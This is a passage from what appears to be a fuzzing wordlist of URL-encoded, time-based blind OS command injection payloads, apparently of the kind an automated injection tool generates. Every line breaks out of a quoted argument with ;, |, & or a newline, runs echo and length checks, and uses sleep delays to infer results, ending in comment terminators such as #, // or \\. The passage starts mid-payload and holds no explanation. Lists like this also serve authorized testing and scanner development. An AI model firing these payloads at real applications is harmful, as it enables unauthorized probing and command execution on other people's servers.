8echo%20DHYUHH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%27%7C%20%5B%201%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%27%7C%20%5B%202%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%27%7C%20%5B%203%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%27%7C%20%5B%204%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%27%7C%20%5B%205%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%27%7C%20%5B%206%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%27%7C%20%5B%207%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%27%7C%20%5B%208%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%27%7C%20%5B%209%20-ne%20%24%28echo%20RLZFDE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20ZYJHAC%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%27%0A%20str%3D%24%28echo%20JTHMZI%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%27%3B%20str%3D%24%28echo%20PSUJGU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%27%7C%20%5B%201%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%27%7C%20%5B%202%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%27%7C%20%5B%203%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%27%7C%20%5B%204%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%27%7C%20%5B%205%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%27%7C%20%5B%206%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%27%7C%20%5B%207%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%27%7C%20%5B%208%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%27%7C%20%5B%209%20-ne%20%24%28echo%20TYMEOG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20YQNAJZ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%27%0A%20str%3D%24%28echo%20ZSGSGJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%27%3B%20str%3D%24%28echo%20ERVJHE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%27%7C%20%5B%201%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%27%7C%20%5B%202%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%27%7C%20%5B%203%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%27%7C%20%5B%204%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%27%7C%20%5B%205%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%27%7C%20%5B%206%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%27%7C%20%5B%207%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%27%7C%20%5B%208%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%27%7C%20%5B%209%20-ne%20%24%28echo%20SUCHGF%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20BJMMJX%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%27%0A%20str%3D%24%28echo%20FPLFHR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%27%7C%20%5B%201%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%27%7C%20%5B%202%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%27%7C%20%5B%203%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%27%7C%20%5B%204%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%27%7C%20%5B%205%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%27%7C%20%5B%206%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%27%7C%20%5B%207%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%27%7C%20%5B%208%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%27%7C%20%5B%209%20-ne%20%24%28echo%20PSPAPE%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%27%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VZETTM%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%27%0A%20str%3D%24%28echo%20GIPRGX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\